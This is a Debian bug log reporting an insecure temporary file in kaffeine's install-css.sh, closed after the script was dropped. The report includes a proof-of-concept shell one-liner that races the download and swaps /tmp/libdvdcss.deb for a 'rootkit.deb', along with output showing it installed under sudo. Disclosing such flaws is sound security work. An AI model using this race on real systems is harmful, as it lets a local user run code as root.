Debian Bug report logs - #554772
install-css.sh: insecure temporary file /tmp/libdvdcss.deb

version graph

Package: kaffeine; Maintainer for kaffeine is Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>; Source for kaffeine is src:kaffeine.

Reported by: Timo Juhani Lindfors <timo.lindfors@iki.fi>

Date: Fri, 6 Nov 2009 12:42:01 UTC

Severity: normal

Tags: security

Found in version kaffeine/0.8.7-1

Fixed in version 1.0-1

Done: Petter Reinholdtsen <pere@hungry.com>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>:
Bug#554772; Package kaffeine. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Timo Juhani Lindfors <timo.lindfors@iki.fi>:
New Bug report received and forwarded. Copy sent to Debian KDE Extras Team <pkg-kde-extras@lists.alioth.debian.org>. (Fri, 06 Nov 2009 12:42:04 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Timo Juhani Lindfors <timo.lindfors@iki.fi>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Date: Fri, 06 Nov 2009 14:09:54 +0200
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information




Reply sent to Petter Reinholdtsen <pere@hungry.com>:
You have taken responsibility. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Notification sent to Timo Juhani Lindfors <timo.lindfors@iki.fi>:
Bug acknowledged by developer. (Mon, 09 Aug 2010 13:33:05 GMT) Full text and rfc822 format available.

Message #10 received at 554772-done@bugs.debian.org (full text, mbox):

From: Petter Reinholdtsen <pere@hungry.com>
To: 554772-done@bugs.debian.org
Subject: Re: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Date: Mon, 09 Aug 2010 15:30:48 +0200
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/install-css.sh no longer exist in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the debian changelog, so I
do not know which in version it was taken away.

Happy hacking,
-- 
Petter Reinholdtsen




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 07 Sep 2010 07:35:37 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 10:37:33 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.